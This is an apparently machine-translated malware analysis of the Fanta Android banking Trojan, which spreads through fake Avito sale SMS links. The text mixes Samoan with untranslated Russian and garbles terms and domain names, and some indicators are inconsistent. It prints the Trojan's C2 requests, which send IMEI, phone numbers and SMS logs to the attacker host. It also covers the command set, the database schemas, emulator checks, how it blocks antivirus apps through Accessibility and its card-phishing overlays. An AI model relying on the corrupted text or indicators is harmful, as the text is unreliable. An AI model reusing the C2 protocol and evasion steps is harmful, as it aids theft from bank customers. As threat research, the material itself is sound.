I se tasi aso e te manaʻo e faʻatau atu se mea i Avito ma, i le tuʻuina atu o se faʻamatalaga auiliili o lau oloa (mo se faʻataʻitaʻiga, se RAM module), o le ae mauaina lenei savali:
O le taimi lava e te tatalaina ai le fesoʻotaʻiga, o le a e vaʻai i se itulau e foliga mai e leai se leaga e logoina oe, le tagata faʻatau fiafia ma le manuia, ua faia se faʻatau:
После того, как вы нажали кнопку “Продолжить”, на ваше Android-устройство будет загружен APK-файл с иконкой и названием, внушающим доверие. Вы установили приложение, которое почему-то запросило права AccessibilityService, потом появились и быстро исчезли пара окон и… Все.
E te alu e siaki lau paleni, ae mo nisi mafuaaga e toe fesili ai lau faletupe mo au faʻamatalaga kata. A maeʻa ona tuʻuina atu faʻamatalaga, e tupu se mea mataʻutia: mo nisi mafuaaga e le o manino ia te oe, o tupe e amata ona mou atu mai lau teugatupe. O loʻo e taumafai e foia le faʻafitauli, ae o lau telefoni e teteʻe: e oomi le "Back" ma le "Home" ki, e le tape ma e le faʻatagaina oe e faʻagaoioia soʻo se puipuiga. O se taunuuga, ua tuua oe e aunoa ma se tupe, o au oloa e leʻi faʻatauina, ua e le mautonu ma mafaufau: o le a le mea na tupu?
O le tali e faigofie: ua avea oe ma tagata afaina i le Android Trojan Fanta, o se sui o le aiga Flexnet. Na faapefea ona tupu lenei mea? Sei o tatou faamatala atu nei.
Tusitala: Andrey Polovinkin, fa'apitoa fa'apitoa i su'esu'ega malware, Ivan Pisarev, fa'apitoa i su'esu'ega o mea leaga.
O nisi fuainumera
O le aiga Flexnet o Android Trojans na muamua lauiloa i tua i le 2015. I luga o se vaitaimi umi o le gaioiga, na faʻalauteleina le aiga i le tele o subspecies: Fanta, Limebot, Lipton, ma isi. O le Trojan, faʻapea foʻi ma atinaʻe e fesoʻotaʻi ma ia, e le tumau: o loʻo atinaʻe ni faʻasalalauga fou fou - i la matou tulaga, o itulau phishing maualuga maualuga e faʻatatau i se tagata faʻatau-faʻatau, ma o loʻo mulimulitaʻia e le au atinaʻe Trojan faiga masani i totonu. Tusitusi virus - faʻaopoopo galuega fou e mafai ai ona gaoia tupe sili atu ona lelei mai masini faʻamaʻi ma faʻaogaina auala puipuia.
Описываемая в данной статье кампания нацелена на пользователей из России, небольшое количество зараженных устройств зафиксировано на Украине, еще меньше — в Казахстане и Беларуси.
E ui lava o Flexnet sa i ai i le Android Trojan arena mo le silia ma le 4 tausaga i le taimi nei ma sa suʻesuʻeina auiliili e le tele o tagata suʻesuʻe, o loʻo lelei pea. Amata mai ia Ianuari 2019, o le aofaʻi o le faʻaleagaina e sili atu i le 35 miliona rubles - ma e naʻo faʻasalalauga i Rusia. I le 2015, o ituaiga eseese o lenei Android Trojan na faʻatau atu i lalo o le eleele, lea e mafai ai foi ona maua le code source o le Trojan ma se faʻamatalaga auiliili. O lona uiga o fuainumera o faʻaleagaina i le lalolagi e sili atu ona mataʻina. E le o se faailoga leaga mo se toeaina faapena, a ea?
Mai le fa'atau atu i le fa'a'ole'ole
E pei ona mafai ona vaʻaia mai le faʻamalama na tuʻuina atu muamua o se itulau phishing mo le Initaneti mo le lafoina o faʻasalalauga Avito, na saunia mo se tagata na afaina. E foliga mai, o loʻo faʻaaogaina e le au osofaʻi se tasi o faʻasalalauga a Avito, lea e maua mai ai le numera telefoni ma le igoa o le tagata faʻatau, faʻapea foʻi ma le faʻamatalaga o oloa. A maeʻa ona faʻalauteleina le itulau ma saunia le faila APK, e tuʻuina atu i le tagata manua se SMS ma lona igoa ma se fesoʻotaʻiga i se itulau phishing o loʻo i ai se faʻamatalaga o lana oloa ma le aofaʻi na maua mai le "faʻatau" o le oloa. I le kilikiina o le ki, e maua ai e le tagata faʻaoga se faila APK leaga - Fanta.
O se suʻesuʻega o le shcet491 [.] ru domain na faʻaalia ai ua tuʻuina atu i le Hostinger's DNS servers:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
O le faila o le domain zone o lo'o iai fa'amaumauga e faasino i tuatusi IP 31.220.23[.]236, 31.220.23[.]243, ma le 31.220.23[.]235. Ae ui i lea, o le fa'amaumauga autu o puna'oa (O se fa'amaumauga) o lo'o fa'asino ile server ile tuatusi IP 178.132.1[.]240.
tuatusi IP 178.132.1[.]240 o loʻo i Netherlands ma o le tagata talimalo WorldStream. O tuatusi IP 31.220.23[.]235, 31.220.23[.]236 ma le 31.220.23[.]243 o lo'o i totonu o Peretania ma o lo'o auai i le server hosting hosting HOSTINGER. Fa'aaogaina e fai ma fa'amaumauga tatalaprov-ru. O vaega o lo'o i lalo na fo'ia i le tuatusi IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
E tatau ona maitauina o feso'ota'iga i le fa'asologa o lo'o i lalo na maua mai toetoe lava o vaega uma:
http://(www.){0,1}<%domain%>/[0-9]{7}
O lenei fa'ata'ita'iga e iai fo'i se feso'ota'iga mai se fe'au SMS. Faʻavae i luga o faʻamaumauga faʻasolopito, na maua ai o le tasi vaega e fetaui ma le tele o fesoʻotaʻiga i le faʻataʻitaʻiga o loʻo faʻamatalaina i luga, lea e faʻaalia ai o le tasi vaega na faʻaaogaina e tufatufa atu ai le Trojan i le tele o tagata afaina.
Забежим немного вперед: в качестве управляющего сервера загруженный по ссылке из СМС троян использует адрес onusedseddohap[.]kalapu. O lenei vaega na lesitala i le 2019-03-12, ma amata mai le 2019-04-29, APK talosaga fegalegaleai ma lenei vaega. E tusa ai ma faʻamaumauga na maua mai le VirusTotal, o le aofaʻi o talosaga e 109 na fegalegaleai ma lenei 'auʻaunaga. O le vaega lava ia na fa'ai'uina i le tuatusi IP 217.23.14[.]27, o loʻo i totonu o Netherlands ma o loʻo umia e le talimalo WorldStream. В качестве регистратора используется faaigoa. Na fo'ia fo'i vaega ile tuatusi IP lea bad-racoon[.]club (amata mai le 2018-09-25) ma leaga-racoon[.]ola (amata mai le 2018-10-25). Fa'atasi ai ma vaega bad-racoon[.]club sili atu nai lo 80 APK faila fegalegaleai ma leaga-racoon[.]ola - sili atu i le 100.
I se tulaga lautele, o le osofaʻiga e faʻasolosolo e pei ona taua i lalo:
Что у Fanta под крышкой?
E pei o le tele o isi Android Trojans, Fanta e mafai ona faitau ma auina atu feʻau SMS, faia USSD talosaga, ma faʻaalia ana lava faamalama i luga o talosaga (e aofia ai faletupe). Ae ui i lea, o le auupega o galuega a lenei aiga ua oʻo mai: Fanta amata faʻaaoga AccessibilityService mo faamoemoega eseese: faitau mea o loʻo i totonu o faʻamatalaga mai isi tusi talosaga, puipuia le iloa ma taofi le faʻatinoina o se Trojan i luga o se masini faʻamaʻi, ma isi. Fanta galue i luga o lomiga uma o le Android e le itiiti ifo nai lo le 4.4. I lenei tusiga o le a tatou vaʻavaʻai totoʻa i le faʻataʻitaʻiga Fanta nei:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Fa'ato'a mae'a fa'alauiloa
Непосредственно после запуска троян скрывает свою иконку. Работа приложения возможна только в том случае, если имя зараженного устройства не находится в списке:
- android_x86
- VirtualBox
- Nexus 5X(ulu povi)
- Nexus 5(sele)
O lenei siaki e faia i le auaunaga autu a le Trojan - Auaunaga Autu. Ina ua faʻalauiloaina mo le taimi muamua, o le faʻasologa o le faʻaogaina o le talosaga e amatalia i tau le aoga (o le faatulagaga mo le teuina o faʻamaumauga o faʻamaumauga ma o latou uiga o le a talanoaina mulimuli ane), ma o se masini faʻamaʻi fou ua resitalaina i luga o le faʻatonuga. O se talosaga HTTP POST ma le ituaiga savali o le a lafo i le server resitala_bot ma faʻamatalaga e uiga i le masini faʻamaʻi (Android version, IMEI, numera o le telefoni, igoa o le tagata faʻatautaia ma le numera o le atunuʻu o loʻo lesitala ai le tagata faʻatautaia). O le tuatusi e fai ma 'au'aunaga e pulea hXXp://onuseseddohap[.]club/controller.php. I le tali atu, e auina atu e le server se feʻau o loʻo i ai fanua bot_id, bot_pwd, faigaluega - o le talosaga e faʻasaoina nei tau e avea ma faʻamaufaʻailoga o le CnC server. Parameter faigaluega faitalia pe a le mauaina le fanua: Fanta faʻaaoga le tuatusi resitala - hXXp://onuseseddohap[.]club/controller.php. O le galuega o le suia o le tuatusi CnC e mafai ona faʻaaogaina e foia ai ni faʻafitauli se lua: e tufatufa tutusa le uta i le va o le tele o sapalai (pe a iai se numera tele o masini faʻamaʻi, o le uta i luga o se upega tafaʻilagi e le faʻaogaina e mafai ona maualuga), ma faʻaaoga foi. se isi 'au'aunaga pe'ā fa'aletonu se tasi o sa'u CnC .
Afai e tupu se mea sese aʻo tuʻuina atu le talosaga, o le a toe faia e le Trojan le faagasologa o le resitalaina pe a uma le 20 sekone.
A maeʻa loa ona resitalaina le masini, o le a faʻaalia e Fanta le savali lenei i le tagata faʻaoga:
Fa'amatalaga taua: o le tautua ua valaauina Saogalemu faiga — наименование сервиса трояна, и после нажатия на кнопку afaina O le a matala se faʻamalama faʻatasi ai ma tulaga Avanoa o le masini faʻamaʻi, lea e tatau ai i le tagata faʻaoga ona tuʻuina atu aia tatau mo le auaunaga leaga:
O le taimi lava e ki ai le tagata faʻaoga AccessibilityService, Fanta maua avanoa i mea o loʻo i totonu o faʻamalama talosaga ma gaioiga na faia i totonu:
I le taimi lava na maeʻa ai le mauaina o aia tatau, e talosagaina e le Trojan aia tatau ma aia tatau e faitau ai faʻamatalaga:
При помощи AccessibilityService приложение имитирует нажатия клавиш, тем самым выдавая себе все необходимые права.
Fanta fatuina ni fa'amaumauga fa'amaumauga se tele (lea o le a fa'amatalaina mulimuli ane) e mana'omia e teu ai fa'amaumauga fa'atulagaina, fa'apea fo'i ma fa'amatalaga na aoina i le faagasologa e uiga i le masini fa'ama'i. Ina ia tuʻuina atu faʻamatalaga aoina, o le Trojan na te faia se galuega toe faia e faʻatulagaina e sii mai ai fanua mai le faʻamaumauga ma maua se faʻatonuga mai le server pule. Ole va ole avanoa ole CnC e fa'atulaga e fa'atatau ile Android version: ile tulaga ole 5.1, ole va ole 10 sekone, a leai 60 sekone.
Ina ia maua le poloaiga, ua faia e Fanta se talosaga GetTask i le server pulega. I le tali atu, e mafai e CnC ona auina atu se tasi o poloaiga nei:
| au | faʻamatalaga |
|---|---|
| 0 | Lafo SMS fe'au |
| 1 | Fai se telefoni po'o le USSD command |
| 2 | Fa'afou se parakalafa vaitaimi |
| 3 | Fa'afou se parakalafa faʻalavelave |
| 6 | Fa'afou se parakalafa smsManager |
| 9 | Amata le aoina o savali SMS |
| 11 | Toe seti lau telefoni ile falegaosimea |
| 12 | Fa'aagai/Ta'e le fa'amauina o le fa'atupuina o pusa fa'atalanoa |
E aoina foʻi e Fanta faʻamatalaga mai le 70 teugatupe faʻapipiʻi, faiga faʻapipiʻi vave ma e-talitupe ma teu i totonu o se faʻamaumauga.
Fa'asaoina fa'amaufa'ailoga
Ina ia teuina faʻamaufaʻailoga, faʻaaogaina e Fanta se auala masani mo le Android platform - Manatu- faila. O fa'atulagaga o le a fa'asaoina i se faila e ta'ua tulaga. O se fa'amatalaga o fa'amaufa'ailoga fa'asaoina o lo'o i le laulau i lalo.
| igoa | Tau masani | Tulaga talafeagai | faʻamatalaga |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| faigaluega | hXXp://onuseseddohap[.]club/ | URL | Pulea le tuatusi server |
| Matagaluega o Galuega | - | mānoa | Upu faataga a le server |
| vaitaimi | 20 | Integer | Vaeluaga taimi. Fa'ailoa mai le umi e tatau ona tolopo ai galuega nei:
|
| faʻalavelave | uma | uma/telNumber | Afai e tutusa le fanua ma le manoa uma poʻo telNumera, o le a faʻalavelaveina le feʻau SMS na maua e le talosaga ma e le faʻaalia i le tagata faʻaoga |
| smsManager | 0 | 0/1 | Fa'afeso'ota'i/fa'amalo le talosaga e pei o le SMS e le maua |
| faitauTatalatala | sese | Moni/sese | Fa'amalo/Ta'e le fa'amauina o mea e tutupu AccessibilityEvent |
Fanta faʻaaoga foi le faila smsManager:
| igoa | Tau masani | Tulaga talafeagai | faʻamatalaga |
|---|---|---|---|
| pckg | - | mānoa | Igoa ole pule ole fe'au SMS na fa'aogaina |
Fegalegaleaiga ma faʻamaumauga
I le taimi o lona faʻaogaina, e faʻaogaina e le Trojan ni faʻamaumauga se lua. Fa'aigoa fa'amaumauga a fa'aaoga e teu ai fa'amatalaga eseese na aoina mai le telefoni. O le database lona lua ua faaigoaina fanta.db ma e fa'aoga e fa'asaoina ai fa'atulagaga e nafa ma le fa'atupuina o fa'amalama phishing ua fuafuaina e aoina fa'amatalaga e uiga i kata faletupe.
Троян использует базу данных а e teu ai fa'amatalaga ua aoina ma fa'amauina au gaioiga. O lo'o teuina fa'amaumauga i se laulau ogalaau. Ina ia fatuina se laulau, faʻaaoga le fesili SQL nei:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)В базе данных содержится следующая информация:
1. Логирование включения зараженного устройства сообщением Ua ki le telefoni!
2. Fa'asilasilaga mai talosaga. O le fe'au e fa'atupuina e tusa ai ma le fa'ata'ita'iga lenei:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Fa'amatalaga pepa fa'akomepiuta mai pepa fa'akomepiuta na faia e le Trojan. Parameter VIEW_NAME atonu o se tasi o mea nei:
- AliExpress
- Avito
- Google Play
- Eseese <%App Name%>
O lo'o fa'amauina le fe'au i le faatulagaga:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Fe'au SMS ulufale/fafo i le faatulagaga:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Fa'amatalaga e uiga i le afifi o lo'o fa'atupuina le pusa fa'atalanoa i le fa'asologa:
(<%Package name%>)<%Package information%>
Fa'ata'ita'iga laulau ogalaau:
O se tasi o galuega a Fanta o le aoina o faʻamatalaga e uiga i kata faletupe. O le aoina o faʻamatalaga e tupu i le fausiaina o faʻamalama phishing pe a tatalaina tusi talosaga. E na'o le tasi e faia e le Trojan le faamalama phishing. O faʻamatalaga na faʻaalia le faamalama i le tagata faʻaoga o loʻo teuina i totonu o se laulau tulaga i totonu o le database fanta.db. Ina ia fatuina se faʻamaumauga, faʻaaoga le fesili SQL nei:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);O fanua laulau uma tulaga e ala i le le mafai ona amata i le 1 (fausia se faamalama phishing). A maeʻa ona tuʻuina atu e le tagata faʻaoga a latou faʻamatalaga, o le a seti le tau i le 0. Faʻataʻitaʻiga o fanua laulau tulaga:
- can_login - o le fanua e nafa ma le faʻaalia o le fomu pe a tatalaina se tusi talosaga
- first_bank - e le faʻaaogaina
- can_avito - o le fanua e nafa ma le faʻaalia o le fomu pe a tatalaina le talosaga Avito
- mafai_ali - o le fanua e nafa ma le faʻaalia o le fomu pe a tatalaina le talosaga Aliexpress
- mafai_seisi - o le fanua e nafa ma le faʻaalia o le fomu pe a tatalaina soʻo se talosaga mai le lisi: Yula, Pandao, Drom Auto, atotupe. Fa'aitiitiga ma ponesi kata, Aviasales, Booking, Trivago
- can_card - o le fanua e nafa ma le faʻaalia o le fomu pe a tatalaina Google Play
Fegalegaleaiga ma le server pulega
Feso'ota'iga feso'ota'iga ma le 'au'aunaga fa'afoe e tupu ile HTTP protocol. Ina ia galue ma le fesoʻotaʻiga, faʻaaogaina e Fanta le faletusi lauiloa Retrofit. O talosaga e lafo i: hXXp://onuseseddohap[.]club/controller.php. E mafai ona suia le tuatusi server pe a lesitala i luga o le server. E mafai ona lafo mai kuki e tali mai le server. Fanta faia talosaga nei i le server:
- Регистрация бота на управляющем сервере происходит один раз при первом запуске. На сервер отправляются следующие данные о зараженном устройстве:
· kuki - kuki na maua mai le 'au'aunaga (taua masani o se manoa gaogao)
· faiga — manoa tumau resitala_bot
· nauna — fa'atoa tumau 2
· version_sdk - ua faia e tusa ai ma le mamanu o loʻo i lalo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI зараженного устройства
· atunuu - code o le atunuu o loʻo lesitala ai le tagata faʻatautaia, i le ISO format
· nūmera — номер телефона
· tagata fagāluega - igoa o le tagata faigaluegaO se faʻataʻitaʻiga o se talosaga na lafoina i le server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>I le tali atu i le talosaga, e tatau i le 'auʻaunaga ona toe faʻafoʻi se mea JSON o loʻo i ai mea nei:
· bot_id - ID ole masini ua pisia. Afai o le bot_id e tutusa ma le 0, o le a toe faia e Fanta le talosaga.
bot_pwd — upu faataga mo le server.
server — pulea tuatusi server. Fa'ailoga e filifili ai. Afai e le o faʻamaonia le parakalafa, o le tuatusi faʻasaoina i le talosaga o le a faʻaaogaina.Fa'ata'ita'iga JSON mea:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Talosaga e maua se poloaiga mai le server. O fa'amatalaga nei e lafo i le 'au'aunaga:
· kuki — kuki maua mai le server
· faʻailoa - id o le masini faʻamaʻi na maua ina ua tuʻuina atu le talosaga resitala_bot
· Matagaluega o Galuega —пароль для сервера
· divice_admin - o le fanua e fuafua pe ua maua aia tatau a le pule. Afai ua maua aia tatau a le pule, o le fanua e tutusa ma 1, a leai 0
· avanoa — Tulaga fa'agaioiga Au'aunaga Avanoa. Afai na amata le auaunaga, o le tau o le 1, a leai 0
· SMSManager — показывает, включен ли троян как приложение по умолчанию для получения СМС
· pupuni - faʻaalia le tulaga o le lau. O le a setiina le tau 1, pe afai o loʻo i luga le lau, a leai 0;O se faʻataʻitaʻiga o se talosaga na lafoina i le server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Faʻalagolago i le faʻatonuga, e mafai e le 'auʻaunaga ona toe faʻafoʻi se mea JSON ma faʻasologa eseese:
· au Lafo SMS fe'au: O faʻamaufaʻailoga o loʻo i ai le numera telefoni, le tusitusiga o le SMS feʻau ma le ID o le feʻau o loʻo lafoina. E fa'aoga le fa'ailoga pe a lafo se fe'au i le 'au'aunaga ma le ituaiga setiSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· au Fai se telefoni po'o le USSD command: O le numera telefoni poʻo le poloaiga e sau i le tino tali.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· au Suia le parakalafa faavaitaimi.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· au Suia le parakalafa fa'alavelave.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· au Suia SmsManager fanua.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· au Aoina fe'au SMS mai se masini ua pisia.
{ "response": [ { "mode": 9 } ], "status":"ok" }· au Toe seti lau telefoni ile falegaosimea:
{ "response": [ { "mode": 11 } ], "status":"ok" }· au Suia le parakalafa ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Tuuina atu o se savali ma le ituaiga setiSmsStatus. Данный запрос осуществляется после исполнения команды Lafo SMS fe'au. O le talosaga e pei o lenei:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Tu'u i luga o fa'amaumauga o fa'amaumauga. E tasi le laina e tu'uina atu ile talosaga. O fa'amaumauga nei e lafo i le 'au'aunaga:
· kuki — kuki maua mai le server
· faiga — manoa tumau setiSaveInboxSms
· faʻailoa - id o le masini faʻamaʻi na maua ina ua tuʻuina atu le talosaga resitala_bot
· matua - tusitusiga i totonu o faʻamaumauga faʻamaumauga o loʻo iai nei (field d mai le laulau ogalaau i totonu o le database а)
· nūmera - igoa o le faamaumauga o lo'o iai nei (field p mai le laulau ogalaau i totonu o le database а)
· sms_mode — tau aofa'i (field m mai le laulau ogalaau i totonu o le database а)Запрос выглядит следующим образом:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Afai e manuia le auina atu i le server, o le a tape le laina mai le laulau. Fa'ata'ita'iga o se mea JSON na toe fa'afo'i mai e le 'au'aunaga:
{ "response":[], "status":"ok" }
Fegalegaleai ma AccessibilityService
AccessibilityService na fa'atinoina e fa'afaigofie ai masini Android e fa'aoga mo tagata e iai mana'oga fa'apitoa. I le tele o tulaga, e manaʻomia fegalegaleaiga faʻaletino e fegalegaleai ma se talosaga. AccessibilityService e fa'atagaina oe e fai fa'apolokalame. Fanta faʻaaogaina le 'auʻaunaga e fai ai faʻamalama pepelo i tusi faʻapipiʻi ma taofia tagata faʻaoga mai le tatalaina o faʻatulagaga o polokalama ma nisi o talosaga.
I le faʻaaogaina o galuega a le AccessibilityService, o le Trojan e mataʻituina suiga i elemene i luga o le lau o le masini faʻamaʻi. E pei ona faʻamatalaina muamua, o le Fanta settings o loʻo i ai se parakalafa e nafa ma galuega faʻapipiʻi ma pusa talatalanoa - faitauTatalatala. Afai e setiina lenei parakalafa, o faʻamatalaga e uiga i le igoa ma le faʻamatalaga o le afifi na faʻaosoina le mea na tupu o le a faʻaopoopo i le database. E faia e le Trojan gaioiga nei pe a faʻaalia mea tutupu:
- Fa'ata'ita'i le oomiina o ki tua ma le fale i tulaga nei:
· pe a manaʻo le tagata faʻaoga e toe faʻafouina lana masini
· pe afai e manaʻo le tagata faʻaoga e tape le talosaga "Avito" poʻo le suia o aia tatau
· pe afai o loʻo taʻua le talosaga "Avito" i luga o le itulau
· pe a tatalaina le Google Play Protect application
· pe a tatalaina itulau i le AccessibilityService faatulagaga
· pe a aliali mai le pusa faʻatalanoaga System Security
· i le tatalaina o le itulau i le "Draw over other app" faatulagaga
· pe a tatalaina le itulau "Talosaga", "Toe Laveai ma toe setiina", "Faʻamaumauga faʻamaumauga", "Toe setiina", "Developer panel", "Faʻapitoa. avanoa”, “O avanoa fa’apitoa”, “Aiā tatau”
· pe afai o le mea na tupu na faia e nisi o talosaga.Lisi o talosaga
- Android
- Matai Matai
- Matua mama
- Matai mama mo le x86 PPU
- Meizu Talosaga Fa'atagaga Pulega
- MIUI Puipuiga
- Matai Mama - Antivirus & Cache ma lapisi mama
- Pulea matua ma GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Fa'amama Virus, Antivirus, Fa'amama (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & puipuiga saoloto 2019
- Mobile Security MegaFon
- AVG Puipuiga mo Xperia
- Saogalemu Feavea'i
- Malwarebytes Antivirus & Puipuiga
- Antivirus mo le Android 2019
- Matai Saogalemu - Antivirus, VPN, AppLock, Booster
- AVG antivirus mo Huawei tablet System Manager
- Samsung Avanoa
- Samsung Smart Manager
- Faʻamaumauga Puipuiga
- Speed Booster
- dr.web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Mobile Security
- Kaspersky Internet Security: Antivirus ma Puipuiga
- Ola maa a Kaspersky: Fa'asao & Fa'aola
- Kaspersky Endpoint Security - puipuiga ma pulega
- AVG Antivirus free 2019 – Puipuiga mo le Android
- Android Antivirus
- Norton Mobile Security ma Antivirus
- Antivirus, firewall, VPN, saogalemu feaveaʻi
- Mobile Security: antivirus, VPN, puipuiga o le gaoi
- Antivirus mo Android
- Afai e talosagaina le faʻatagaga pe a tuʻuina atu se feʻau SMS i se numera puʻupuʻu, Fanta simulates kiliki i luga o le pusa siaki Manatua le filifiliga ma faamau e lafo.
- A e taumafai e aveese aia tatau pule mai le Trojan, e lokaina le lau telefoni.
- Taofi le fa'aopoopoina o pule fou.
- Afai o le antivirus talosaga dr.web iloa se taufaamata'u, Fanta faata'ita'i oomi le faamau le amanaia.
- O le Trojan e faʻataʻitaʻiina le oomiina o le pito i tua ma le fale pe a fai o le mea na tupu na faia e le talosaga Samsung Device Care.
- Fanta faia phishing windows ma fomu mo le faʻaofiina o faʻamatalaga e uiga i kata faletupe pe a faʻalauiloa se talosaga mai se lisi e aofia ai le 30 auaunaga Initaneti eseese. Faatasi ai ma i latou: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ma isi.
Fomu phishing
Fanta suʻesuʻe poʻo fea talosaga o loʻo faʻaogaina i luga o le masini faʻamaʻi. Afai e tatalaina se talosaga o tului, e faʻaalia e le Trojan se faʻamalama phishing i luga o isi mea uma, o se fomu mo le faʻapipiʻiina o faʻamatalaga kata faletupe. E tatau i le tagata fa'aoga ona tu'uina fa'amaumauga nei:
- Numera o le kata
- Aso e muta ai le pepa
- CVV
- Igoa tagata fai pepa (e le mo faletupe uma)
Fa'alagolago i le fa'aoga o lo'o fa'agaoioia, o le a fa'aalia fa'amalama phishing eseese. Lalo o faʻataʻitaʻiga o nisi o latou:
Aliexpress:
Avito:
Mo nisi talosaga, eg. Google Play Maketi, Aviasales, Pandao, Booking, Trivago:
Na faapefea moni lava
O le mea e lelei ai, o le tagata na mauaina le SMS feʻau o loʻo faʻamatalaina i le amataga o le tusiga na faʻaalia o se tagata poto faapitoa i luga o le initaneti. O le mea lea, o le mea moni, e le o se faatonu e ese mai le tasi na taʻua muamua: na maua e se tagata se SMS manaia, mulimuli ane na ia tuʻuina atu i le Vaega-IB Threat Hunting Intelligence team. O le taunuuga o le osofaiga o lenei tusiga. Manuia le i'uga, sa'o? Ae ui i lea, e le o tala uma e maeʻa ma le manuia, ma ina ia le foliga mai o lau faʻataʻitaʻiga ua leiloa tupe, i le tele o tulaga e lava le tausisia o tulafono ua leva ona faʻamatalaina:
- aua le fa'apipi'i tusi talosaga mo se masini feavea'i ma le Android OS mai so'o se mea e ese mai i le Google Play
- Pe a faʻapipiʻi se talosaga, faʻalogo faʻapitoa i aia tatau e talosagaina e le talosaga
- gauai atu i faʻaopoopoga o faila na sii mai
- fa'apipi'i fa'afouga Android OS i taimi uma
- aua le asiasi atu i punaoa masalosalo ma aua le la'uina mai faila mai iina
- не переходить по ссылкам, полученным в СМС-сообщениях.
puna: www.habr.com